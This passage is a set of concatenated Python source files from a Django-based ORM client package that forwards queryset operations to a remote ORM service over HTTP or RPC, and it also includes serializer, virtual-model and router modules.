return self.__do_query('count', *args, **kwargs)
def first(self, *args, **kwargs) -> VirtualModel:
return self.__do_query('first', *args, **kwargs)
def last(self, *args, **kwargs) -> VirtualModel:
return self.__do_query('last', *args, **kwargs)
def latest(self, *args, **kwargs) -> VirtualModel:
return self.__do_query('latest', *args, **kwargs)
def order_by(self, *args, **kwargs):
return self.__do_query('order_by', *args, **kwargs)
def select_related(self, *args, **kwargs):
return self.__do_query('select_related', *args, **kwargs)
def prefetch_related(self, *args, **kwargs):
return self.__do_query('prefetch_related', *args, **kwargs)
def distinct(self, *args, **kwargs):
return self.__do_query('distinct', *args, **kwargs)
def only(self, *args, **kwargs):
return self.__do_query('only', *args, **kwargs)
def defer(self, *args, **kwargs):
return self.__do_query('defer', *args, **kwargs)
def create(self, *args, **kwargs):
return self.__do_query('create', *args, **kwargs)
def update(self, **kwargs):
self.__update_payload('update', data={
'args': [],
'kwargs': kwargs
})
return self.fetch()
def delete(self):
self.__update_payload('delete', data={
'args': [],
'kwargs': {}
})
return self.fetch()
def get_or_create(self, *args, **kwargs):
try:
return self.get(*args, **kwargs), False
except ObjectDoesNotExist:
return self.create(**kwargs), True
def custom(self, name, **kwargs):
return self.__do_query(name, *(), **kwargs)
@classmethod
def execute_many(cls, payloads: List):
payload_requests = list(
map(lambda orm: orm._ORMServices__payload_request, payloads))
url = urljoin(ORM_SERVICE_URL, "/api/v1/orm_services/execute_many")
response = requests.get(url, data=json.dumps(payload_requests), headers={
"content-type": "application/json",
'Authorization': ORM_SERVICE_AUTH_HEADER
})
try:
response = response.json()
except Exception:
raise Exception(response.content)
else:
result = []
for index, orm_service in enumerate(payloads):
result.append(orm_service._ORMServices__bind(data=response[index]))
return result
def _save(self, payload, *args, **kwargs):
self.__do_query('save', *args, **kwargs)
url = urljoin(ORM_SERVICE_URL, "/api/v1/orm_services/save")
return self.__request_post(
url=url,
payload=payload
        )

# ---- end of file: orm_service_connector88/connector.py (package: 88orm-service-connector) ----
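# Illustrative usage sketch (added for clarity; the model and field names are
# assumptions, and settings.ORM_SERVICE must point at a running ORM service):
#
#     members = ORMServices(model='member', fields=['id', 'user_id'])
#     qs = members.filter(is_active=True).order_by('-id')  # lazily builds the payload
#     first = qs.first()            # one HTTP round trip, returns a VirtualModel
#     rows = members.values('id').fetch()   # raw list of dicts from the service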
from collections import OrderedDict
from typing import Dict
from rest_framework import serializers
from .connector import ORMServices
class ModelSerializer(serializers.Serializer):
map_fields = {
'AutoField': serializers.IntegerField,
'CharField': serializers.CharField,
'IntegerField': serializers.IntegerField,
'ListField': serializers.ListField,
'OneToOneField': serializers.IntegerField,
'ForeignKey': serializers.IntegerField
}
def get_fields(self) -> Dict:
assert hasattr(self, 'Meta'), (
'Class {serializer_class} missing "Meta" attribute'.format(
serializer_class=self.__class__.__name__
)
)
assert hasattr(self.Meta, 'model'), (
'Class {serializer_class} missing "Meta.model" attribute'.format(
serializer_class=self.__class__.__name__
)
)
assert hasattr(self.Meta, 'fields'), (
'Class {serializer_class} missing "Meta.fields" attribute'.format(
serializer_class=self.__class__.__name__
)
)
        assert len(self.Meta.fields) > 0, (
            'Class {serializer_class} must not declare an empty "Meta.fields"'.format(
                serializer_class=self.__class__.__name__
            )
        )
ret = super(ModelSerializer, self).get_fields()
uncreated_fields = set(self.Meta.fields) - set(ret.keys())
model_info = self.Meta.model.model_info
model_fields = model_info.get('fields')
model_related = model_info.get('related_names')
if uncreated_fields:
for uncreated_field in uncreated_fields:
if uncreated_field in model_fields:
field = model_fields.get(uncreated_field).get('type')
elif uncreated_field in model_related:
field = 'ListField'
if model_related.get(uncreated_field).get('type') == 'OneToOneRel':
field = 'IntegerField'
else:
field = 'CharField'
field_class = self.map_fields.get(field, serializers.CharField)
ret.update({
uncreated_field: field_class()
})
for key, value in ret.items():
value.bind(key, self)
return ret
def to_representation(self, instance):
ret = OrderedDict()
model_info = self.Meta.model.model_info
model_fields = model_info.get('fields')
for field, field_class in self.get_fields().items():
attr = field_class.source or field
try:
if model_fields.get(attr).get('type') in ['ForeignKey', 'OneToOneField']:
attr = f"{attr}_id"
except AttributeError:
pass
value = getattr(instance, attr, None)
if isinstance(value, ORMServices):
if attr in model_info.get('related_names'):
value = instance.reverse_related(attr)
if field_class.__class__.__name__ == 'SerializerMethodField':
value = instance
if value is not None:
value = field_class.to_representation(value)
ret[field] = value
        return ret

# ---- end of file: orm_service_connector88/serializers.py (package: 88orm-service-connector) ----
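# Illustrative usage sketch (added for clarity; 'member' and its field names are
# assumptions). Note that Meta.model is an ORMServices instance, not a Django model:
#
#     class MemberSerializer(ModelSerializer):
#         class Meta:
#             model = ORMServices('member')
#             fields = ['id', 'user_id', 'created']
#
#     MemberSerializer(instance).data   # -> OrderedDict keyed by the declared fields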
import json
from typing import Dict
from urllib.parse import urljoin
import requests
from django.conf import settings
# NOTE: All models info will be stored here.
# contains fields and related_names,
# keep note don't redefine the MODELS variable
# for keeping the reactivity. If you want to
# change the value, just clear or append it.
MODELS = []
service_settings = getattr(settings, 'ORM_SERVICE', {
"url": "",
"auth_header": ""
})
ORM_SERVICE_URL = service_settings.get("url")
ORM_SERVICE_AUTH_HEADER = service_settings.get("auth_header")
class VirtualModel(object):
def __init__(
self,
model: str,
payload: dict,
value=None,
model_info=None
):
self._payload = payload
app_label = None
if len(model.split('.')) == 2:
app_label, model = model.split('.')
self.__model = model
self._app_label = app_label
self._attrs = {}
if not model_info:
model_info = get_model(model, app_label)
if not app_label:
self._app_label = model_info.get('app_label')
self._fields = model_info.get('fields') # type: Dict
self._related_names = model_info.get('related_names') # type: Dict
if value:
self._set_value(value)
    def __repr__(self):
        if self._attrs:
            key = self._attrs.get('id') or self._attrs.get(next(iter(self._attrs)))
        else:
            key = None
        model_name = self.__model
if model_name.islower():
model_name = model_name.capitalize()
return f"<{model_name}: {key}>"
def __setattr__(self, key, value):
try:
super(VirtualModel, self).__setattr__(key, value)
if key in self._fields:
self._attrs.update({
key: value
})
except Exception:
pass
def _set_attr_single_instance(self, key, value):
from .connector import ORMServices
attr_value = None
if self._attrs.get(f"{key}_id"):
related_model = value.get('related_model')
model = f"{related_model.get('app_label')}.{related_model.get('name')}"
attr_value = ORMServices(model)
setattr(self, key, attr_value)
def _set_related_attributes(self):
from .connector import ORMServices
for key, value in self._fields.items():
if not hasattr(self, key):
type_field = value.get('type')
if type_field in ['ForeignKey', 'OneToOneField']:
self._set_attr_single_instance(key, value)
elif type_field == 'ManyToManyField':
related_model = value.get('related_model')
model = f"{related_model.get('app_label')}.{related_model.get('name')}"
attr_value = ORMServices(model)
setattr(self, key, attr_value)
for key, value in self._related_names.items():
if not hasattr(self, key):
related_model = value.get('related_model')
model = f"{related_model.get('app_label')}.{related_model.get('name')}"
attr_value = ORMServices(model)
setattr(self, key, attr_value)
def _set_value(self, attrs: Dict):
self._attrs.update(attrs)
for key, value in attrs.items():
setattr(self, key, value)
self._set_related_attributes()
def get_related(self, name):
from .connector import ORMServices
attr = getattr(self, name)
if isinstance(attr, ORMServices):
if name in self._fields:
field = self._fields.get(name)
if field.get('type') in ['ForeignKey', 'OneToOneField']:
return attr.get(id=self._attrs.get(f"{name}_id"))
elif field.get('type') == 'ManyToManyField':
key = field.get('related_model').get('related_query_name')
return attr.filter(**{key: self.id})
return attr
def reverse_related(self, related_name):
try:
orm = getattr(self, related_name) # type: ORMServices
rel = self._related_names.get(related_name)
related_model = rel.get('related_model')
filter_kwargs = {
related_model.get('related_field'): self.id
}
if rel.get('type') == 'OneToOneRel':
return orm.get(**filter_kwargs)
return orm.filter(**filter_kwargs)
except AttributeError:
raise AttributeError(f'{self.__model} has no related {related_name}')
def refresh_from_db(self):
from .connector import ORMServices
instance = ORMServices(
model=self.__model,
fields=list(self._attrs)
)
url = urljoin(ORM_SERVICE_URL, "/api/v1/orm_services/get_queryset")
attrs = instance._ORMServices__request_get(
url=url,
payload=self._payload
)
if isinstance(attrs, dict):
            for key, value in attrs.items():
setattr(self, key, value)
def save(self):
from .connector import ORMServices
instance = ORMServices(
model=self.__model,
fields=list(self._attrs)
)
payload = self._payload.copy()
payload.get("payload").update({
"save": self._attrs
})
return instance._save(payload)
class ModelNotFound(Exception):
pass
class MultipleModelsReturned(Exception):
pass
def initialize_models(force=False):
global MODELS
if not MODELS or force:
url = urljoin(ORM_SERVICE_URL, "/api/v1/orm_services/get_models")
response = requests.get(url, headers={
"content-type": "application/json",
'Authorization': ORM_SERVICE_AUTH_HEADER
})
if response.status_code == 400:
raise Exception(response.text)
try:
response = response.json()
except json.decoder.JSONDecodeError:
if response.text:
raise Exception(response.text)
else:
MODELS.clear()
MODELS += response
def get_model(name: str, app_label=None) -> Dict:
initialize_models()
name = name.lower()
result = list(filter(
lambda model: model.get('model') == name,
MODELS
))
if app_label:
result = list(filter(
lambda model: model.get('app_label') == app_label,
result
))
if not result:
msg = f"Cannot find model {name}"
if app_label:
msg = f"{msg} with app_label {app_label}"
raise ModelNotFound(msg)
if len(result) > 1:
multiple = list(map(lambda x: x.get('app_label'), result))
raise MultipleModelsReturned(f"Please provide app_label: {multiple}")
    return result[0]

# ---- end of file: orm_service_connector88/models.py (package: 88orm-service-connector) ----
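# Illustrative usage sketch (added for clarity; model names are assumptions):
#
#     info = get_model('member', app_label='accounts')
#     info['fields']           # e.g. {'id': {'type': 'AutoField', ...}, ...}
#     info['related_names']    # reverse relations keyed by accessor name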
__author__ = "Rimba Prayoga"
__copyright__ = "Copyright 2019, 88Spares"
__credits__ = ["88 Tech"]
__maintainer__ = "Rimba Prayoga"
__email__ = "[email protected]"
__status__ = "Development"
import base64
import json
from datetime import date, datetime
from typing import List
from urllib.parse import urljoin
import requests
from django.conf import settings
from django.core.files.base import ContentFile
from django.db import models
from django.db.models import Q, ObjectDoesNotExist
from django.utils.functional import cached_property
from .models import initialize_models, get_model, VirtualModel
initialize_models()
service_settings = getattr(settings, 'ORM_SERVICE', {
"url": "",
"auth_header": "",
"communication": {
"method": "rest"
}
})
ORM_SERVICE_URL = service_settings.get("url")
ORM_SERVICE_AUTH_HEADER = service_settings.get("auth_header")
ORM_SERVICE_COMMUNICATION = service_settings.get("communication", {})
if ORM_SERVICE_COMMUNICATION.get("method") == "rpc":
try:
from nameko.standalone.rpc import ClusterRpcProxy
except ImportError:
raise Exception('Nameko is required for using rpc.')
class ORM88(object):
"""
    ORM Services Connector.
    Because you are already familiar with the Django ORM,
    you can use it like the Django ORM :D
"""
def __init__(self, model: str, fields=None, **kwargs):
initialize_models()
app_label = None
if len(model.split('.')) == 2:
app_label, model = model.split('.')
if isinstance(model, str):
self._model_name = model
elif isinstance(model, type) and isinstance(model(), models.Model):
self._model_name = model._meta.model_name.lower()
else:
raise TypeError('unsupported type "%s" for model.' % type(model))
self._app_label = app_label
self._payload = {}
if fields is None:
fields = ['__all__']
self._fields = fields
self._exclude_fields = kwargs.get('exclude_fields', None)
self._result_cache = {}
self._CHUNK_SIZE = 20
self._prefetch_done = False
self.model_info = get_model(model, app_label)
########################
# PYTHON MAGIC METHODS #
########################
def __repr__(self):
if self._payload:
_slice = self._payload.get('slice')
if _slice:
start = _slice.get('start')
stop = _slice.get('stop')
step = _slice.get('step')
data = list(self[start:stop:step])
else:
data = list(self[:self._CHUNK_SIZE])
if len(data) >= self._CHUNK_SIZE:
data[-1] = '...(remaining elements truncated)...'
return f"<Virtual Queryset {data}>"
return super(ORM88, self).__repr__()
def __iter__(self):
data = self._result_cache.get('result')
if not self._payload:
data = []
if data is None:
self._bind()
data = self._result_cache.get('result')
return iter(data)
def __len__(self):
count = self._result_cache.get("count", 0)
if not count and self.__last_query:
self._bind()
count = self._result_cache.get("count", 0)
return count
def __bool__(self):
return bool(len(self))
def __getitem__(self, item):
result_cache = self._result_cache.get('result')
if result_cache or self._prefetch_done:
return result_cache[item]
if isinstance(item, slice):
clone = self._clone()
clone._payload.update({
"slice": {
"start": item.start,
"stop": item.stop,
"step": item.step
}
})
return clone
_self = self._bind()
if _self == self:
result_cache = self._result_cache.get('result')
return result_cache[item]
return _self
def __call__(self, *args, **kwargs):
return VirtualModel(self._model_name, self.__payload_request)
@cached_property
def __exclude_params(self):
return [
"all",
"exists",
"count",
"first",
"last",
"latest",
"values",
"save",
"distinct"
]
@cached_property
def __is_model_instance(self):
for method in ["first", "last", "latest"]:
if self._payload.get(method):
return True
return False
@property
def __payload_request(self):
payload = {
"model": self._model_name,
"payload": self._payload,
"fields": self._fields,
"exclude_fields": self._exclude_fields
}
if self._app_label:
payload.update({
"app_label": self._app_label
})
return payload
@property
def __last_query(self) -> str:
"""
:return: last query
"""
queries = list(self._payload.keys()).copy()
if 'slice' in queries:
queries.pop(queries.index('slice'))
try:
return queries[-1]
except IndexError:
return ''
@property
def __is_return_different_object(self) -> bool:
return self.__last_query in [
'first', 'last', 'get', 'latest',
'exists', 'count', 'create'
]
@property
def __is_return_instance(self) -> bool:
return self.__last_query in ['first', 'last', 'get', 'latest', 'create']
    def __update_payload(self, name, data) -> None:
        try:
            existed = self._payload.get(name).copy()  # type: dict
        except AttributeError:
            pass
        else:
            existed.update({
                "args": [*existed.get("args", []), *data.get("args", [])],
                "kwargs": {
                    **existed.get("kwargs", {}),
                    **data.get("kwargs", {})
                }
            })
            data = existed
        self._payload.update({
            name: data
        })
# --- expressions
def __resolve_q(self, args: Q) -> List:
"""
Resolve expression Q. e.g: Q(a=b) | Q(c=d).
        :param args: the Q expression to serialize
        :return: a JSON-serializable ['Q', params, connector] list
"""
_, params, connector = args.deconstruct()
params = list(params)
for index, param in enumerate(params.copy()):
if isinstance(param, Q):
params[index] = self.__resolve_q(param)
elif isinstance(param, tuple):
params[index] = list(param)
return ['Q', params, connector]
def __resolve_expression(self, expr):
expression_handlers = {
"Q": self.__resolve_q
}
return expression_handlers.get(expr)
def __do_query(self, name, *args, **kwargs):
assert self._payload.get('slice') is None, \
"Cannot filter a query once a slice has been taken."
_args = list(args).copy()
for index, arg in enumerate(_args):
if isinstance(arg, Q):
_args[index] = self.__resolve_q(arg)
clone = self._clone()
for key, value in kwargs.copy().items():
if isinstance(value, VirtualModel):
related = self._get_related_field(key)
foreign_field = related.get('foreign_related_fields')
if foreign_field == 'timestampedmortalbasemodel_ptr':
foreign_field = 'pk'
elif hasattr(value, f'{foreign_field}_id'):
foreign_field = f'{foreign_field}_id'
if related.get('type') in ['ForeignKey', 'OneToOneField']:
kwargs.pop(key)
kwargs.update({
f'{key}_id': getattr(value, foreign_field)
})
elif isinstance(value, ORM88):
kwargs.update({
key: value.__payload_request
})
payload = {
"args": _args,
"kwargs": kwargs
}
clone.__update_payload(name, data=payload)
if clone.__is_return_different_object:
if clone.__is_return_instance:
return clone._bind()
return clone.fetch()
return clone
def _get_related_field(self, name):
return (self.model_info.get('fields').get(name) or
self.model_info.get('related_names').get(name))
def _clone(self):
"""
:return: clone of current class
"""
exclude_fields = self._exclude_fields
if isinstance(exclude_fields, (dict, list)):
exclude_fields = self._exclude_fields.copy()
model_name = self._model_name
if self._app_label:
model_name = f'{self._app_label}.{model_name}'
clone = self.__class__(
model=model_name,
fields=self._fields.copy(),
exclude_fields=exclude_fields
)
clone._payload = self._payload.copy()
return clone
def __clear_query(self, name=None):
if name is not None:
try:
del self._payload[name]
except KeyError:
pass
else:
self._payload = {}
def _bind(self, model=None, data=None):
if data is None:
data = self.fetch()
if isinstance(data, dict):
_model = model
if _model is None:
_model = self._model_name
vi = VirtualModel(
model=_model,
payload=self.__payload_request,
value=data,
model_info=self.model_info
)
return vi
vi = {
"result": [],
"count": 0
}
if isinstance(data, list):
if {'values', 'values_list'} & set(self._payload.keys()):
vi.update({
"result": data,
"count": len(data)
})
else:
for i in data:
_vi = VirtualModel(
model=self._model_name,
payload=self.__payload_request,
value=i,
model_info=self.model_info
)
vi.get('result').append(_vi)
vi.update({
"count": vi.get("count") + 1
})
self._result_cache = vi
return self
# for custom method
def call_manager_method(self, name, *args, **kwargs):
return self.__do_query(name, *args, **kwargs)
def _serialize_data(self, data: dict):
ret = data.copy()
for key, value in data.items():
if isinstance(value, (date, datetime)):
ret.update({
key: str(value)
})
elif isinstance(value, VirtualModel):
ret.pop(key)
ret.update({
f'{key}_id': value.pk
})
elif isinstance(value, ContentFile):
b64_value = base64.b64encode(value.file.getvalue())
value = f"data:image/jpeg;base64,{b64_value.decode()}"
ret.update({
key: value
})
return ret
# --- fetch data from orm services
def __request_get(self, url, payload, params=None):
if ORM_SERVICE_COMMUNICATION.get("method") == "rpc":
with ClusterRpcProxy(ORM_SERVICE_COMMUNICATION.get("conf")) as rpc:
return rpc.orm_service.query(payload)
response = requests.get(url, data=json.dumps(payload), headers={
"content-type": "application/json",
'Authorization': ORM_SERVICE_AUTH_HEADER
}, params=params)
if response.status_code == 400:
raise Exception(response.text)
elif response.status_code == 404:
raise self.DoesNotExist(
"%s matching query does not exist." % self._model_name.capitalize())
try:
return response.json()
except json.decoder.JSONDecodeError:
if response.text:
raise Exception(response.text)
def __request_post(self, url, payload):
if ORM_SERVICE_COMMUNICATION.get("method") == "rpc":
with ClusterRpcProxy(ORM_SERVICE_COMMUNICATION.get("conf")) as rpc:
return rpc.orm_service.query(payload)
response = requests.post(url, data=json.dumps(payload), headers={
"content-type": "application/json",
'Authorization': ORM_SERVICE_AUTH_HEADER
})
try:
return response.json()
except json.decoder.JSONDecodeError:
raise Exception(response.text)
def fetch(self):
url = urljoin(ORM_SERVICE_URL, "/api/v1/orm_services/get_queryset")
return self.__request_get(
url=url,
payload=self.__payload_request
)
def fetch_with_relation(self, relation_data):
"""
fetch data with relation object
:param relation_data: -- e.g:
ORM88(model='partitem').all()
.fetch_with_relation({'member':[{'user': ['id', 'email']}]})
:return: -- response:
[{'member': {'user': {'id': 556, 'email': '[email protected]'}}},]
"""
payload = self.__payload_request.copy()
payload.update({
"relation_data": relation_data
})
url = urljoin(ORM_SERVICE_URL, "/api/v1/orm_services/get_queryset")
return self.__request_get(
url=url,
payload=payload
)
def get_property(self, property_name):
payload = self.__payload_request.copy()
payload.update({
"property_name": property_name
})
url = urljoin(ORM_SERVICE_URL, "/api/v1/orm_services/get_property")
return self.__request_get(url=url, payload=payload)
def call_property(self, property_name):
payload = self.__payload_request.copy()
payload.update({
"property_name": property_name
})
url = urljoin(ORM_SERVICE_URL, "/api/v1/orm_services/call_property")
return self.__request_get(url=url, payload=payload)
# --- querying
def get_queryset(self, *args, **kwargs):
return self.__do_query('all', *args, **kwargs)
def all(self):
return self.get_queryset()
def exists(self) -> bool:
return self.__do_query('exists')
def get(self, *args, **kwargs) -> VirtualModel:
return self.__do_query('get', *args, **kwargs)
def filter(self, *args, **kwargs):
return self.__do_query('filter', *args, **kwargs)
def exclude(self, *args, **kwargs):
return self.__do_query('exclude', *args, **kwargs)
def values(self, *args, **kwargs):
return self.__do_query('values', *args, **kwargs)
def values_list(self, *args, **kwargs):
return self.__do_query('values_list', *args, **kwargs)
def count(self, *args, **kwargs) -> int:
return self.__do_query('count', *args, **kwargs)
def first(self, *args, **kwargs) -> VirtualModel:
return self.__do_query('first', *args, **kwargs)
def last(self, *args, **kwargs) -> VirtualModel:
return self.__do_query('last', *args, **kwargs)
def latest(self, *args, **kwargs) -> VirtualModel:
return self.__do_query('latest', *args, **kwargs)
def order_by(self, *args, **kwargs):
return self.__do_query('order_by', *args, **kwargs)
def select_related(self, *args, **kwargs):
return self.__do_query('select_related', *args, **kwargs)
def prefetch_related(self, *args, **kwargs):
return self.__do_query('prefetch_related', *args, **kwargs)
def distinct(self, *args, **kwargs):
return self.__do_query('distinct', *args, **kwargs)
def only(self, *args, **kwargs):
return self.__do_query('only', *args, **kwargs)
def defer(self, *args, **kwargs):
return self.__do_query('defer', *args, **kwargs)
def create(self, *args, **kwargs):
return self.__do_query('create', *args, **kwargs)
def update(self, **kwargs):
self.__update_payload('update', data={
'args': [],
'kwargs': self._serialize_data(kwargs)
})
return self.fetch()
def delete(self):
self.__update_payload('delete', data={
'args': [],
'kwargs': {}
})
return self.fetch()
def get_or_create(self, *args, **kwargs):
try:
return self.get(*args, **kwargs), False
except self.DoesNotExist:
return self.create(**kwargs), True
def custom(self, name, **kwargs):
return self.__do_query(name, *(), **kwargs)
def filter_offline(self, **kwargs):
def _filter(item):
if isinstance(item, VirtualModel):
ret = []
for key, value in kwargs.items():
ret.append(getattr(item, key) == value)
return all(ret)
return False
return list(filter(_filter, self._result_cache.get('result', [])))
@classmethod
def execute_many(cls, payloads: List):
payload_requests = list(
map(lambda orm: orm._ORM88__payload_request, payloads)
)
url = urljoin(ORM_SERVICE_URL, "/api/v1/orm_services/execute_many")
response = requests.get(url, data=json.dumps(payload_requests), headers={
"content-type": "application/json",
'Authorization': ORM_SERVICE_AUTH_HEADER
})
try:
response = response.json()
except Exception:
raise Exception(response.content)
else:
result = []
for index, orm_service in enumerate(payloads):
result.append(orm_service._bind(data=response[index]))
return result
def _save(self, payload, *args, **kwargs):
self.__do_query('save', *args, **kwargs)
url = urljoin(ORM_SERVICE_URL, "/api/v1/orm_services/save")
payload.get('payload')['save'] = self._serialize_data(
payload.get('payload').get('save')
)
return self.__request_post(
url=url,
payload=payload
)
class DoesNotExist(ObjectDoesNotExist):
        pass

# ---- end of file: orm88/connector.py (package: 88orm) ----
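# Illustrative usage sketch (added for clarity; model and field names are
# assumptions, and settings.ORM_SERVICE must be configured):
#
#     parts = ORM88('partitem')
#     qs = parts.filter(Q(status='active') | Q(owner_id=1))  # Q is serialized for transport
#     item = qs.first()        # VirtualModel built from one service response
#     item.name = 'renamed'
#     item.save()              # POSTs only the plain model fields back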
import json
from typing import Dict
from urllib.parse import urljoin
import requests
from django.conf import settings
from django.utils.functional import cached_property
from .related_descriptors import create_reverse_many_to_one
# NOTE: All models info will be stored here.
# contains fields and related_names,
# keep note don't redefine the MODELS variable
# for keeping the reactivity. If you want to
# change the value, just clear or append it.
MODELS = []
service_settings = getattr(settings, 'ORM_SERVICE', {
"url": "",
"auth_header": ""
})
ORM_SERVICE_URL = service_settings.get("url")
ORM_SERVICE_AUTH_HEADER = service_settings.get("auth_header")
class VirtualModel(object):
def __init__(
self,
model: str,
payload: dict,
value=None,
model_info=None
):
self._payload = payload
app_label = None
if len(model.split('.')) == 2:
app_label, model = model.split('.')
self.__model = model
self._app_label = app_label
self._attrs = {}
if not model_info:
model_info = get_model(model, app_label)
if not app_label:
self._app_label = model_info.get('app_label')
self._class_name = model_info.get('class_name')
self._fields = model_info.get('fields') # type: Dict
self._related_names = model_info.get('related_names') # type: Dict
if value:
self._set_value(value)
def __repr__(self):
if self._attrs:
key = self._attrs.get(
'__str__',
(self._attrs.get('id') or
self._attrs.get(
next(iter(self._attrs))
))
)
else:
key = None
return f"<{self._class_name}: {key}>"
def __setattr__(self, key, value):
try:
super(VirtualModel, self).__setattr__(key, value)
if key in self._fields or key in self._related_names:
if isinstance(value, dict):
info = self._fields.get(key, self._related_names.get(key))
related_model = info.get('related_model')
model = f"{related_model.get('app_label')}.{related_model.get('name')}"
value = self.__class__(model, self._payload, value=value)
super(VirtualModel, self).__setattr__(key, value)
self._attrs.update({
key: value
})
except Exception:
pass
@cached_property
def _save_fields(self):
fields = self._fields.copy()
for key, value in fields.copy().items():
if value.get('type') == 'ManyToManyField':
fields.pop(key)
return fields
def _set_attr_single_instance(self, key, value):
from .connector import ORM88
if not hasattr(self, key) and f"{key}_id" in self._attrs:
related_model = value.get('related_model')
model = f"{related_model.get('app_label')}.{related_model.get('name')}"
attr_value = ORM88(model)
setattr(self, key, attr_value)
def set_many_to_one_or_many(self, key, value, related_field):
from .connector import ORM88
related_model = value.get('related_model')
model = f"{related_model.get('app_label')}.{related_model.get('name')}"
if hasattr(self, key):
_value = getattr(self, key)
if isinstance(_value, self.__class__):
return None
elif isinstance(_value, list):
attr_value = create_reverse_many_to_one(model, {
'filter': {
'args': [],
'kwargs': {
related_field: self.id
}
}
})()
attr_value._bind(data=_value)
attr_value._prefetch_done = True
elif isinstance(_value, dict):
attr_value = self.__class__(model, self._payload, value=_value)
else:
attr_value = ORM88(model)
else:
attr_value = ORM88(model)
type_field = self._fields.get(
key,
self._related_names.get(key, {})
).get('type')
payload = {}
if type_field in ['OneToOneField', 'OneToOneRel']:
payload.update({
'get': {
'args': [],
'kwargs': {
related_field: self.id
}
}
})
else:
payload.update({
'filter': {
'args': [],
'kwargs': {
related_field: self.id
}
}
})
attr_value._payload.update(payload)
setattr(self, key, attr_value)
def _set_related_attributes(self):
for key, value in self._fields.items():
type_field = value.get('type')
if type_field in ['ForeignKey', 'OneToOneField']:
self._set_attr_single_instance(key, value)
elif type_field == 'ManyToManyField':
related_model = value.get('related_model')
self.set_many_to_one_or_many(key, value,
related_model.get('related_query_name'))
for key, value in self._related_names.items():
related_model = value.get('related_model')
self.set_many_to_one_or_many(key, value, related_model.get('related_field'))
def _set_value(self, attrs: Dict):
self._attrs.update(attrs)
for key, value in attrs.items():
setattr(self, key, value)
self._set_related_attributes()
def _get_related(self, name):
from .connector import ORM88
attr = getattr(self, name)
if isinstance(attr, ORM88):
if name in self._fields:
field = self._fields.get(name)
if field.get('type') in ['ForeignKey', 'OneToOneField']:
attr = attr.get(id=self._attrs.get(f"{name}_id"))
setattr(self, name, attr)
return attr
elif field.get('type') == 'ManyToManyField':
return attr
return attr
def _reverse_related(self, related_name):
from .connector import ORM88
try:
orm = getattr(self, related_name) # type: ORM88
except AttributeError:
raise AttributeError(f'{self.__model} has no related {related_name}')
else:
if isinstance(orm, ORM88):
rel = self._related_names.get(related_name)
related_model = rel.get('related_model')
filter_kwargs = {
related_model.get('related_field'): self.id
}
if rel.get('type') == 'OneToOneRel':
orm = orm.get(**filter_kwargs)
setattr(self, related_name, orm)
return orm
return orm
def rel(self, name):
if name in self._fields:
return self._get_related(name)
return self._reverse_related(name)
def has_rel(self, name):
try:
return bool(self.rel(name))
except Exception:
return False
def refresh_from_db(self):
from .connector import ORM88
instance = ORM88(
model=self.__model,
fields=list(self._attrs)
)
url = urljoin(ORM_SERVICE_URL, "/api/v1/orm_services/get_queryset")
attrs = instance._ORM88__request_get(
url=url,
payload=self._payload
)
if isinstance(attrs, dict):
for key, value in attrs.items():
setattr(self, key, value)
return self
raise ValueError(attrs)
def save(self):
from .connector import ORM88
instance = ORM88(
model=self.__model,
fields=list(self._attrs)
)
payload = self._payload.copy()
model_fields = {}
for field in self._save_fields:
value = self._attrs.get(field)
if isinstance(value, ORM88):
field = f'{field}_id'
value = getattr(self, field)
if value is not None:
model_fields.update({
field: value
})
payload.get("payload").update({
"save": model_fields
})
ret = instance._save(payload)
self._set_value(ret)
self._payload.get('payload').pop('save')
self._payload.get('payload').update({
'get': {
'args': [],
'kwargs': {
'id': self.id
}
}
})
return self
class ModelNotFound(Exception):
pass
class MultipleModelsReturned(Exception):
pass
def initialize_models(force=False):
global MODELS
if not MODELS or force:
url = urljoin(ORM_SERVICE_URL, "/api/v1/orm_services/get_models")
response = requests.get(url, headers={
"content-type": "application/json",
'Authorization': ORM_SERVICE_AUTH_HEADER
})
if response.status_code == 400:
raise Exception(response.text)
try:
response = response.json()
except json.decoder.JSONDecodeError:
if response.text:
raise Exception(response.text)
else:
MODELS.clear()
MODELS += response
def get_model(name: str, app_label=None) -> Dict:
initialize_models()
name = name.lower()
result = list(filter(
lambda model: model.get('model') == name,
MODELS
))
if app_label:
result = list(filter(
lambda model: model.get('app_label') == app_label,
result
))
if not result:
msg = f"Cannot find model {name}"
if app_label:
msg = f"{msg} with app_label {app_label}"
raise ModelNotFound(msg)
if len(result) > 1:
multiple = list(map(lambda x: x.get('app_label'), result))
raise MultipleModelsReturned(f"Please provide app_label: {multiple}")
return result[0] | 88orm | /88orm-0.1.9.1.tar.gz/88orm-0.1.9.1/orm88/models.py | models.py |
from collections import OrderedDict
from django.conf.urls import url
from rest_framework.routers import (
SimpleRouter as _SimpleRouter,
APIRootView,
SchemaView,
SchemaGenerator
)
from rest_framework.settings import api_settings
from rest_framework.urlpatterns import format_suffix_patterns
from orm88.connector import ORM88
class SimpleRouter(_SimpleRouter):
def get_default_basename(self, viewset):
"""
If `basename` is not specified, attempt to automatically determine
it from the viewset.
"""
queryset = getattr(viewset, 'queryset', None) # type: ORM88
assert queryset is not None, (
'`basename` argument not specified, '
'and could not automatically determine '
'the name from the viewset, as it does '
'not have a `.queryset` attribute.'
)
return queryset._model_name.lower()
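# Example (hypothetical viewset): registration mirrors DRF's router API; when
# `basename` is omitted it is derived from the viewset's ORM88 queryset by
# `get_default_basename` above.
#
#   router = DefaultRouter()
#   router.register(r'books', BookViewSet)
#   urlpatterns = router.urls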
class DefaultRouter(SimpleRouter):
"""
The default router extends the SimpleRouter, but also adds in a default
API root view, and adds format suffix patterns to the URLs.
"""
include_root_view = True
include_format_suffixes = True
root_view_name = 'api-root'
default_schema_renderers = None
APIRootView = APIRootView
APISchemaView = SchemaView
SchemaGenerator = SchemaGenerator
def __init__(self, *args, **kwargs):
if 'root_renderers' in kwargs:
self.root_renderers = kwargs.pop('root_renderers')
else:
self.root_renderers = list(api_settings.DEFAULT_RENDERER_CLASSES)
super().__init__(*args, **kwargs)
def get_api_root_view(self, api_urls=None):
"""
Return a basic root view.
"""
api_root_dict = OrderedDict()
list_name = self.routes[0].name
for prefix, viewset, basename in self.registry:
api_root_dict[prefix] = list_name.format(basename=basename)
return self.APIRootView.as_view(api_root_dict=api_root_dict)
def get_urls(self):
"""
Generate the list of URL patterns, including a default root view
for the API, and appending `.json` style format suffixes.
"""
urls = super().get_urls()
if self.include_root_view:
view = self.get_api_root_view(api_urls=urls)
root_url = url(r'^$', view, name=self.root_view_name)
urls.append(root_url)
if self.include_format_suffixes:
urls = format_suffix_patterns(urls)
